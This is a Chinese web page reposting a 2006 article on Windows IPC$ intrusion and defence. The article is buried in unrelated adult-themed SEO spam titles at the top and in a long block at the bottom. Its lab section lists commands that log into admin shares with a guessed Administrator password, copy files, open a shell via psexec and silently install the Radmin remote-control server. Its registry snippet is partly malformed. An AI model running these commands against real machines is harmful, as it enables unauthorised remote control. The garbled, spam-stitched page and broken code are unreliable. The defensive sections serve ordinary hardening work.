国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

IPC安全防范研究
2006-01-10   網絡

  網絡安全遵循木桶原理,即整個網絡環境中網絡安全的水平是由該網絡中防護水平最弱的計算機所決定的。在單位內部網絡中,大部分安全都是建立在基于“信任”的基礎上,而沒有采取安全防范方法,認為沒有誰會進行破壞,沒有誰會獲取情報信息。在這種環境下,遠程網絡連接安全是一個不容忽視的安全問題,值得進行探討。

什么是IPC
  IPC是Internet Process Connection的縮寫,也就是遠程網絡連接。它是Windows NT及Windows 2000特有的一項功能。IPC是Windows的一個重要模塊,網上鄰居以及網絡共享都是通過IPC來實現的。黑客或者入侵者利用IPC$共享來實現入侵。網絡上也常常將利用IPC$來實現入侵,稱為IPC$漏洞。IPC$連接分為IPC$空連接和帶有一定權限IPC$連接,IPC$空連接沒有任何權限,但是可以獲取該主機的netbios信息;而帶有權限的IPC$連接則可以執行命令和對文件進行復制、刪除和修改等操作,從安全的角度來說,IPC$是一個存在安全隱患的因素。

IPC$入侵原理
  IPC$入侵的最主要原理就是獲取被入侵主機的密碼,利用有權限的IPC$連接到主機并復制文件到主機上,然后運行木馬程序或者執行命令來實現完全控制。如果系統默認共享全部打開,通過字典軟件生成用戶口令密碼,再利用某些軟件進行用戶登錄密碼的暴力猜解,獲取用戶密碼只是時間問題。因此網絡遠程連接(IPC)安全是網絡安全中一個不容忽視的問題。

常見IPC漏洞攻擊方法
  1.利用IPC漏洞應具備的條件

  (1)知道賬號和口令,且賬號的權限必須是System以上,本系統中使用是Administator權限。在絕大多數環境中,利用軟件所掃描出來的弱口令一般都是管理員(Administrator)權限,如圖1所示。

  (2)系統沒有禁用遠程IPC$連接
  (3)能夠掃描到對方計算機上所開放的445、135或者139端口
  2.試驗
  (1)試驗環境
  ◆ Windows 2000 Professional +SP4虛擬機
  ◆ 系統未安裝殺毒軟件和防火墻
  ◆ 目標機IP地址為192.168.1.4
  ◆ 遠程控制文件R_server.exe、raddrv.dll、AdmDll.dll。除了Radmin以外還有其他的遠程控制軟件也可以使用。
  (2)探測目標機開放端口
  ◆ 使用sfind工具。使用命令格式為sfind -p 192.168.1.4
  ◆ 使用NT自動攻擊工具
  (3)獲取目標機管理員賬號和密碼
  (4)執行命令
net use \192.168.1.4ipc$ "123456" /user:"Administrator"
copy *.*
\192.168.1. 4admin$ 其中*.*包含所有的控制文件。
psexec
\192.168.1.4 cmd
  通過命令行方式安裝R_Server。直接在psexec中執行以下命令:
netstat -an |find "4899"
regsrc.exe/pass:lovemeloveyou/port:4899/save/silence
regsrc.exe /install /silence
net start r_server
netstat -an |find "4899"
  執行結果表示Radmin遠程控制軟件服務端安裝成功,然后通過radmin客戶端可以直接對該計算機實施遠程控制。

安全防范方法
  1.管理層次防范方法
  在網絡管理中常流行一句話“三分技術,七分管理”。其實在網絡安全中也是“三分技術,七分管理”,安全重在管理。只有意識上的重視才能帶來長久的安全。
  (1)安全審計
  密碼的安全是整個網絡安全中的一個重要因素,因此應從審計的角度加強管理,可以對系統是否安裝殺毒軟件、防火墻軟件、安裝系統補丁、系統設置密碼等方面進行安全審計,并配置一個安全管理人員。
  (2)安全知識培訓
  網絡安全也是一門技術,它由很多知識構成。因此了解和實施需要一個過程,這個過程就是培訓和教育。通過培訓來提高安全意識和安全技能,通過知識和法律教育來普及計算安全知識和計算機犯罪方面的法律意識和責任,增強安全感和責任感。
  2.技術層次防范方法
  (1)查看網絡連接情況
  使用“netstat -an”查看本機與網絡的連接情況。該命令可以查看目前所建立的連接,系統所開放的服務端口。
  (2)查看IPC$連接情況
  使用“net use”命令查看網絡共享連接情況,如果顯示結果是“清單是空的”則表示無IPC$連接。否則會顯示連接的的詳細信息。
  (3)安裝防火墻軟件
  (4)關閉掉缺省共享
  關閉缺省共享有兩種方式,一種是徹底的禁用共享,一種是開機后刪除共享。
  開機后刪除共享,可以將如下代碼復制到記事本,然后將其另存為delshare.bat文件,并將其添加到系統的啟動中,這樣系統啟動后就會自動刪除默認共享。
net share admin$ /del
net share ipc$ /del
net share c /del
net share d /del
net share e /del
  徹底刪除共享,可以直接將以下代碼復制到文本文件,并保存為delshare.reg文件,然后自己雙擊該文件將其導入注冊表即可。
REGEDIT4
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices lanmanserverparameters]
"AutoShareServer"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesTcpip Parameters]
"DefaultTTL"= 0-0xff
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesl anmanserverparameters]
"AutoshareWks"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetControlLsa]
  (5)禁止Schedule服務
  直接在“開始”-“運行”中輸入“services.msc”,在服務控制面板中停止掉
本文通過對IPC$入侵方法的分析和研究,提出了技術層次和管理層次的防范。通過以上的分析,可以看出IPC的安全是一個不容忽視的安全問題,因此進行網絡遠程連接的安全防范是非常必須的。

熱詞搜索:

上一篇:L-Blog的三個漏洞
下一篇:Squid安全策略

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产综合自拍| 亚洲乱码国产乱码精品精| 国产精品国产三级国产| 亚洲一区www| 老妇喷水一区二区三区| 亚洲欧洲精品一区| 国产欧美一区二区三区在线老狼| 久久久亚洲精品一区二区三区 | 伊大人香蕉综合8在线视| 久久久久久久久久久久久女国产乱| 伊人久久大香线| 国产欧美日韩在线观看| 欧美亚一区二区| 欧美电影电视剧在线观看| 久久精品一区二区三区中文字幕| 亚洲神马久久| 一区二区黄色| 亚洲免费不卡| 在线看国产一区| 国产亚洲欧美日韩在线一区 | 蜜臀av在线播放一区二区三区 | 伊人一区二区三区久久精品| 国产老女人精品毛片久久| 欧美激情在线免费观看| 久久午夜视频| 欧美成人国产一区二区| 欧美一区二区啪啪| 亚洲综合色在线| 亚洲免费中文| 欧美一区二区三区男人的天堂| 亚洲嫩草精品久久| 亚洲欧美影音先锋| 欧美亚洲自偷自偷| 久久米奇亚洲| 欧美三级特黄| 国产亚洲在线| 亚洲乱码国产乱码精品精98午夜 | 国产欧美在线观看| 韩国一区二区三区在线观看| 樱桃国产成人精品视频| 99在线|亚洲一区二区| 亚洲欧美综合v| 免费在线国产精品| 国产精品vvv| 国产亚洲精品久久飘花| 激情视频一区| 久久国产主播精品| 久久天天综合| 欧美午夜宅男影院在线观看| 国产精品香蕉在线观看| 国产一区二区三区免费不卡 | 欧美三区在线观看| 国产一区在线观看视频| 亚洲视频专区在线| 美女脱光内衣内裤视频久久网站| 欧美无乱码久久久免费午夜一区| 韩国v欧美v日本v亚洲v| 一区二区三区日韩欧美| 欧美成人按摩| 亚洲国产精品福利| 久久国产主播| 国产亚洲一区二区精品| 亚洲图中文字幕| 欧美天天在线| 亚洲夜间福利| 欧美日韩精品一区二区| 99成人免费视频| 国产精品福利av| 亚洲免费视频成人| 国产伦精品一区二区三区免费| 亚洲女人天堂av| 国产精品一二三| 久久久九九九九| 国产在线精品一区二区夜色| 久久精品一区二区三区中文字幕| 激情文学综合丁香| 欧美国产精品一区| 99精品久久| 国产婷婷一区二区| 欧美aaaaaaaa牛牛影院| 日韩视频免费观看| 国产精品日韩欧美一区| 美女福利精品视频| 亚洲男人第一网站| 激情久久久久久| 欧美色123| 久久久久久久国产| 欧美国产精品专区| 午夜影视日本亚洲欧洲精品| 欧美日韩精品免费观看视一区二区 | 亚洲国产成人高清精品| 欧美+亚洲+精品+三区| 亚洲小视频在线| 在线观看的日韩av| 欧美日韩亚洲一区二区| 久久久免费观看视频| 亚洲视频香蕉人妖| 99视频超级精品| 狠狠色香婷婷久久亚洲精品| 欧美日韩国产成人精品| 国产精品午夜在线| 欧美1区视频| 蜜臀av性久久久久蜜臀aⅴ| 欧美在线日韩精品| 久久精品人人做人人爽| 久久久www成人免费精品| 久久精品亚洲国产奇米99| 在线亚洲欧美专区二区| 亚洲精品一区二区三区不| 99国产精品久久久久久久成人热| 亚洲免费观看视频| 亚洲在线一区二区| 销魂美女一区二区三区视频在线| 亚洲欧美中文日韩v在线观看| 欧美在线观看网址综合| 欧美成人69av| 国产一区二区三区在线观看精品 | 精品成人一区二区三区四区| 国内精品久久久久影院薰衣草| 在线视频国产日韩| 国产区二精品视| 国产一区白浆| 亚洲午夜激情在线| 免费观看成人www动漫视频| 国产精品无码永久免费888| 亚洲观看高清完整版在线观看| 91久久中文字幕| 久久国产一区二区| 国产精品美女一区二区| 亚洲精品视频免费观看| 欧美freesex8一10精品| 欧美久色视频| 日韩亚洲欧美成人| 欧美日韩亚洲激情| 日韩视频精品在线| 欧美大色视频| 最新中文字幕一区二区三区| 欧美亚洲在线观看| 国产精品免费看| 亚洲一区在线播放| 国产精品私房写真福利视频| 亚洲婷婷国产精品电影人久久| 欧美激情精品久久久久久蜜臀| 日韩视频免费观看| 欧美激情一二三区| 一本色道久久88精品综合| 国产精品xvideos88| 亚洲欧美久久久久一区二区三区| 国产亚洲成av人在线观看导航| 久久婷婷影院| 一区二区三区久久久| 亚洲午夜精品久久久久久浪潮 | 免费亚洲网站| 亚洲精品孕妇| 精品91免费| 欧美成人免费一级人片100| 亚洲国产精品激情在线观看| 蜜臀91精品一区二区三区| 在线免费不卡视频| 欧美日韩国产麻豆| 久久琪琪电影院| 夜夜嗨av色一区二区不卡| 国产精品电影观看| 久久亚洲精品视频| 在线综合视频| 亚洲三级国产| 亚洲免费在线观看| 亚洲黄色免费电影| 国产欧美精品在线观看| 免费的成人av| 女仆av观看一区| 久久性天堂网| 久久综合色8888| 久久精品91久久久久久再现| 亚洲欧美视频一区| 亚洲一区二区精品在线观看| 亚洲黄色在线视频| 伊人夜夜躁av伊人久久| 久久先锋资源| 久久久久久91香蕉国产| 性欧美videos另类喷潮| 午夜精品一区二区三区在线| 亚洲精品社区| 99精品视频网| 性欧美8khd高清极品| 久久爱另类一区二区小说| 亚洲欧美日韩在线高清直播| 亚洲在线1234| 久久九九久精品国产免费直播| 欧美一区二区高清| 久久不见久久见免费视频1| 久久成人18免费观看| 六月婷婷久久| 欧美性一二三区| 在线成人激情视频| 亚洲精品久久久一区二区三区| 亚洲美女精品久久| 亚洲一区二区欧美| 老司机aⅴ在线精品导航| 欧美日韩另类丝袜其他|